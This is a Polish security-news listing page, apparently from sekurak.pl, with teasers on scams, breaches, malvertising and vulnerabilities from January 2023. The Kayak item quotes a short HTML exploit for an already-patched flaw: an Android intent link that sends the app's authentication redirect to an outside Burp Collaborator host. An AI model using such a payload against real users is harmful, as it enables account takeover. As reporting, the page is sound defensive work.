[nowość] Poznaj bezpieczeństwo Windows. Cześć pierwsza: usługi systemowe. Nowe, bezpłatne szkolenie od sekuraka!

Aktualności

Czy z jakiegoś serwisu ciekną dane kart kredytowych? Canarytokens umożliwia stworzenie specjalnej, fejkowej karty…

23 stycznia 2023, 09:46 | W biegu | 0 komentarzy
Czy z jakiegoś serwisu ciekną dane kart kredytowych? Canarytokens umożliwia stworzenie specjalnej, fejkowej karty…

Nowa funkcja jest obecnie w wersji beta i budzi na tyle duże zainteresowanie, że obecnie wchodząc na serwis https://canarytokens.org/generate i wybierając wygenerowanie numeru karty kredytowej, możemy spotkać się z takim komunikatem: Jeśli z kolei już się uda, otrzymamy tego typu numer: W założeniu mogę wygenerować dużą liczbę takich kart, autoryzacja…

Czytaj dalej »

Socjohackerzy wbili się do infrastruktury Riot Games. „Mamy tymczasowe problemy z dostarczeniem nowego contentu”.

21 stycznia 2023, 14:48 | W biegu | komentarzy 10
Socjohackerzy wbili się do infrastruktury Riot Games. „Mamy tymczasowe problemy z dostarczeniem nowego contentu”.

Firma znana chyba przede wszystkim z hitu League of Legends poinformowała o incydencie na Twitterze: Poza tym, że użyto socjotechniki, niewiele więcej wiemy o incydencie. Warto jednak przypomnieć relatywnie niedawną akcję z kradzieżą kodów źródłowych Electronic Arts. W tym ostatnim przypadku historia była prosta (i również polegała na zaprzęgnięciu socjo):…

Czytaj dalej »

Klikasz na telefonie w linka i masz przejęte konto w appce mobilnej Kayaka

21 stycznia 2023, 09:26 | W biegu | komentarze 4
Klikasz na telefonie w linka i masz przejęte konto w appce mobilnej Kayaka

Parę miesięcy temu pisaliśmy o ciekawej podatności w appce mobilnej Tiktoka, a teraz świeżo załatana podatność w appce serwisu Kayak. Idąc od końca – wystarczyło podrzucić ofierze linka do strony, na której hostowany był tego typu exploicik (specyficznie przygotowany link): <!DOCTYPE html> <html> <body> <a id=”exploit” href=”jakis_intent://externalAuthentication#Intent;scheme=kayak;package=com.kayak.android;component=com.kayak.android.web.ExternalAuthLoginActivity;action=android.intent.action.VIEW;S.ExternalAuthLoginActivity.EXTRA_REDIRECT_URL=https://jsfl9yn414bp1z2sujwfjsj3ruxlla.burpcollaborator.net;end”>Exploit</a>; </body> </html> Jeśli…

Czytaj dalej »

Ciekawy sposób na ukrywanie scamowych linków na LinkedIn – zobaczcie ten przypadek.

20 stycznia 2023, 16:14 | W biegu | 0 komentarzy
Ciekawy sposób na ukrywanie scamowych linków na LinkedIn – zobaczcie ten przypadek.

Świeży mini case study, o którym poinformował nas czytelnik: Gdzie prowadzi ten wpis? Na pierwszy rzut oka wygląda, że do polsatnews.pl. Jeśli przypatrzycie się zrzutowi powyżej – nie ma tam żadnej literówki. Jeśli klikniecie w linka, wylądujecie… ze sporym prawdopodobieństwem na (prawdziwej) stronie www.polsatnews.pl Gdzie więc tutaj jest scam? W…

Czytaj dalej »

Wrocław. Ktoś rozkleja plakaty z takim kodem QR… „zbiór informacji o obywatelach Ukrainy”. Link prowadzi do Proton Drive…

20 stycznia 2023, 14:38 | Aktualności | komentarzy 18
Wrocław. Ktoś rozkleja plakaty z takim kodem QR… „zbiór informacji o obywatelach Ukrainy”. Link prowadzi do Proton Drive…

Jeden z czytelników przesłał nam dzisiaj rano takie zdjęcie: Z ciekawostek – tutaj lokalizacja tego miejsca na Google Street View: Gdzie prowadzi QR kod? Do adresu: drive.proton[.]me (usługa storage cloudowego od Protona). Tam z kolei plik .doc: oświadczenie_o_cudzoziemcach_przebywających_w_rp.doc wyglądający mniej więcej tak: Czy plik jest złośliwy? Wygląda na to, że…

Czytaj dalej »

Googlał jaki OS jest najlepszy, jeśli jego komputer posiada 4 GB RAM-u. Pierwszy zwrócony link – wpis wygenerowany przez AI

20 stycznia 2023, 09:58 | W biegu | komentarzy 20
Googlał jaki OS jest najlepszy, jeśli jego komputer posiada 4 GB RAM-u. Pierwszy zwrócony link – wpis wygenerowany przez AI

Dyskusja dookoła tego tematu – tutaj. Historia obrazkowa w trzech częściach poniżej: Po kliknięciu w pierwszy wynik Googla, za pierwszym razem rzeczywiście u mnie pojawiał się efekt widoczny poniżej (kolejne próby – inne wyniki – to uwaga dla osób, które chcą sprawdzić problem własnoręcznie). Czy powyższy content został wygenerowany przez…

Czytaj dalej »

„Gotowe!” Przeszło 400 000 komentarzy pod scamem na FB gdzie rzekomo rozdają 5 nowych Toyot Hilux

19 stycznia 2023, 20:42 | W biegu | komentarzy 17
„Gotowe!” Przeszło 400 000 komentarzy pod scamem na FB gdzie rzekomo rozdają 5 nowych Toyot Hilux

Dla odważnych – link do scamu: hxxps://www.facebook[.]com/Camping455/ Facebookowe tłumaczenie opisu do posta na j. polski jest dość kulawe, ale generalnie oszustom chodzi o to, żeby wpisać 'Gotowe’ w komentarzu. No więc w komentarzach mamy odmianę 'Gotowe’ z całego świata. Co się dzieje po kliknięciu przycisku 'Zarejestruj się’? Jesteśmy kierowani na…

Czytaj dalej »

Badacze: zwykłe routery WiFi są w stanie „widzieć” osoby przebywające w danym pomieszczeniu.

19 stycznia 2023, 17:28 | Aktualności | komentarzy 7
Badacze: zwykłe routery WiFi są w stanie „widzieć” osoby przebywające w danym pomieszczeniu.

Wersja clickbaitowa: „dzięki WiFi można widzieć przez ściany„. No dobra, przez ściany nie można widzieć z wykorzystaniem WiFi, ale być może osiągnięcie tego celu jest blisko. Pod koniec zeszłego roku pokazano drona, który jest w stanie „widzieć” urządzenia WiFi, które znajdują się za ścianą budynku. „Widzieć”, w sensie wskazać ich…

Czytaj dalej »

Wbił się do wewnętrznego panelu admina Google. Pomógł całkowity przypadek: awaria w dostawie prądu oraz specyficzne ustawienia na telefonie badacza…

19 stycznia 2023, 13:24 | Aktualności | komentarze 4
Wbił się do wewnętrznego panelu admina Google. Pomógł całkowity przypadek: awaria w dostawie prądu oraz specyficzne ustawienia na telefonie badacza…

Ciekawa podatność, za którą Google wypłacił $13337. Jeśli wczytacie się w opis problemu, to w zasadzie… nie ma tam żadnego hackingu. Badacz zaczął od prób dobicia się (z poziomu Internetu) do pewnego adresu IP Googla, ale nieskutecznie. Na drodze stawał ekran logowania (Google Proxy). Żadna próba obejścia nie działała, a…

Czytaj dalej »

Złośliwe reklamy w Google zwiększają poziom agresji. Na celowniku: Notepad++, Winrar, CCleaner, Virtualbox, VLC…

18 stycznia 2023, 15:06 | W biegu | komentarzy 17
Złośliwe reklamy w Google zwiększają poziom agresji. Na celowniku: Notepad++, Winrar, CCleaner, Virtualbox, VLC…

Jeśli ktoś czyta na bieżąco Sekuraka, to już ostatnio kilka razy widział alerty o fałszywych reklamach w Google. Również niektóre historie realnie kończyły się np. przejęciem konta googlowego ofiary. Jaka zmiana nastąpiła ostatnio? Fałszywych reklam jest jeszcze więcej, a ponadto potrafią pojawiać w grupach na pierwszej stronie wyników z Google….

Czytaj dalej »

Kolejny manager haseł z wyciekiem? Nie, ale Norton powiadamia użytkowników o innym problemie

18 stycznia 2023, 13:24 | W biegu | komentarzy 5
Kolejny manager haseł z wyciekiem? Nie, ale Norton powiadamia użytkowników o innym problemie

Nie jest to spektakularny atak hakerski jak w przypadku ostatniej głośnej sprawy z LastPass, jednak warto zwrócić uwagę, co się zadziało. 1 grudnia 2022 r. pracownicy Gen Digital (dawniej Symantec Corporation i NortonLifeLock) zauważyli zwiększoną liczbę nieudanych logowań do kont użytkowników Norton Password Managera. Ruch ten zwiększał się każdego dnia,…

Czytaj dalej »

Appka mierząca parametry standardowego klucza na podstawie jego zdjęcia. Ułatwia dorobienie duplikatu…

18 stycznia 2023, 10:37 | Aktualności | komentarzy 9
Appka mierząca parametry standardowego klucza na podstawie jego zdjęcia. Ułatwia dorobienie duplikatu…

Zobaczcie appkę KeyDecoder (temat namierzony u @prywatnika). Wystarczy zrobić zdjęcie na tle obiektu o wielkości standardowej karty kredytowej i voilà: Twórca wyraźnie zaznacza, że dorabianie kluczy bez zgody właściciela jest nielegalne, a appka służy tylko celom edukacyjnym / legalnym zdaniom (np. pentesty): This Key Decoding app is meant to be…

Czytaj dalej »

Za $100 kupił przenośny dysk SSD 16 TB. Po podpięciu do Windows rzeczywiście 16TB. Serio? ;-)

18 stycznia 2023, 09:13 | W biegu | komentarze 42
Za $100 kupił przenośny dysk SSD 16 TB.  Po podpięciu do Windows rzeczywiście 16TB. Serio? ;-)

Dysk widoczny na zdjęciu poniżej w cenie $100 – nawet jeśli wygląda jak no-name – jawi się jako super okazja. Podejrzanie dobra okazja. Im dłużej ekipa Review Geek analizowała widoczną powyżej okazję, pojawiało się znaków zapytania. Po pierwsze dostarczony kabel USB-C -> USB-A. Kopiowanie 16 TB po „starym” USB byłoby…

Czytaj dalej »